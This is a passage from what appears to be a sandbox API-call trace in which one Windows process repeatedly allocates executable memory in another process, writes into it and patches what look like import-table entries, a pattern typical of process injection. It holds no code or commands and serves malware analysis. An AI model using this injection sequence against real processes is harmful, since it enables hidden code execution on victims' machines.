NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.538] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.538] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.538] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.538] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.552] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.552] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.552] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.552] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.552] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.552] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.552] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949cc4*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949cc4*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0140.552] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.553] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.553] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.553] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.553] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.553] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.553] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.553] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.553] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.554] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.554] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.554] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.554] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.554] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.554] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949cd0*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949cd0*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0140.554] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.554] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.555] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.555] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.555] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.555] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.555] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.555] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.555] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.555] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.556] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.556] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.556] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.556] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949d3a, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="ADVAPI32.dll") returned 13 [0140.556] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.556] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0140.556] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.556] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.556] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.557] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.557] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.557] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.557] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.561] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.561] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.561] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.561] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.561] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.561] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.562] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949cf6*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949cf6*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.562] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.562] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.562] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.562] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.562] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.563] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.563] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.563] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.563] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.563] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.564] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.564] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.564] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a000, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.564] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.564] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d0a*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d0a*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.564] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.565] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.565] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.565] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.565] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.565] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.565] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.566] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.566] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.566] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.566] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.566] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.567] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a008, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.567] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.567] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d18*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d18*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.567] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.567] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.567] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.568] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.568] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.568] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.568] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.568] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.568] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.568] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.568] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.569] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.569] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a010, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.569] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.569] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a09a*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a09a*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.569] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.569] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.570] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.570] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.570] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.570] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.570] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.571] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.571] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.571] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.571] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.571] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.571] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a018, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.571] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.572] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a086*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a086*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.572] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.572] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.572] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, 